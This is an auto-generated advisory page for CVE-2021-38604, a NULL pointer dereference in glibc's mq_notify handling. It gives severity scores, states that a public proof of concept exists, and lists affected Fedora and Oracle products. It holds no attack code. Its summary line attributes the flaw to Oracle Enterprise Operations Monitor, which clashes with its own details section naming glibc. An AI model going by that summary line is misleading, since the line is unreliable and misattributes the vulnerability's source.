Cyber Resilience

CVE-2021-38604

HighPublic PoC

Published: 12 August 2021

Published
12 August 2021
Modified
30 May 2025
KEV Added
Patch
CVSS Score v3.1 7.5 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score 0.0010 27.5th percentile
Risk Priority 15 60% EPSS · 20% KEV · 20% CVSS

Summary

CVE-2021-38604 is a high-severity NULL Pointer Dereference (CWE-476) vulnerability in Oracle Enterprise Operations Monitor. Its CVSS base score is 7.5 (High).

Operationally, ranked at the 27.5th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.

EU & UK References

Vulnerability details

In librt in the GNU C Library (aka glibc) through 2.34, sysdeps/unix/sysv/linux/mq_notify.c mishandles certain NOTIFY_REMOVED data, leading to a NULL pointer dereference. NOTE: this vulnerability was introduced as a side effect of the CVE-2021-33574 fix.

CWE(s)

Related Threats

No named actor attribution yet. ATT&CK technique mapping in progress for this CVE.

Affected Assets

gnu
glibc
≤ 2.34
fedoraproject
fedora
35
oracle
communications cloud native core binding support function
22.1.3
oracle
communications cloud native core network function cloud native environment
22.1.0
oracle
communications cloud native core network repository function
22.1.2, 22.2.0
oracle
communications cloud native core security edge protection proxy
22.1.1
oracle
communications cloud native core unified data repository
22.2.0
oracle
enterprise operations monitor
4.3, 4.4, 5.0

Mitigating Controls

No mitigating controls mapped yet. The per-CVE control annotator has not reached this CVE.

References